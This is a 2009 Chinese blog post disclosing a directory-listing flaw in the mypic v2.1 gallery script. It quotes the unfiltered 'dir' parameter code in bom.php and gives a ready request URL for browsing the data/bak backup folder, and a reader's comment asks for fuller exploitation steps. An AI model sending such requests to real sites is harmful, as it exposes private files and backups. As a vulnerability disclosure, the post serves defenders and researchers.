百度空间 | 百度首页 
 
查看文章
  
mypic v2.1遍历文件漏洞
2009年03月24日 星期二 19:13

漏洞作者:幻泉[B.S.N]

官方网站: http://www.diqiye.com/mypic/

漏洞说明:
/bom.php (文件没做任何访问限制)
  
Code:
if (isset($_GET['dir'])){ //config the basedir
     $basedir=$_GET['dir'];//这个没做过滤可以输入任何目录
}else{
     $basedir = '.';
}

$auto = 1;

checkdir($basedir);

function checkdir($basedir){
     if ($dh = opendir($basedir)) {
         while (($file = readdir($dh)) !== false) {
             if ($file != '.' && $file != '..'){
                 if (!is_dir($basedir."/".$file)) {
                     echo "filename: $basedir/

$file ".checkBOM("$basedir/$file")." <br>";
                 }else{
                     $dirname = $basedir."/".

$file;
                     checkdir($dirname);
                 }
             }
         }
     closedir($dh);
     }
}
......
function rewrite ($filename, $data) {
     $filenum = fopen($filename, "w");
     flock($filenum, LOCK_EX);
     fwrite($filenum, $data);
     fclose($filenum);
}

利用
http://127.0.0.1/mypic1/bom.php?dir=./data/bak/


类别:漏洞新闻 | 添加到搜藏 | 浏览() | 评论 (1)
 
最近读者:
 
网友评论:
1
2009年03月27日 星期五 20:58 | 回复
大哥   下次能详细点说怎么利用么 看不懂 俺是菜菜 谢谢额
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu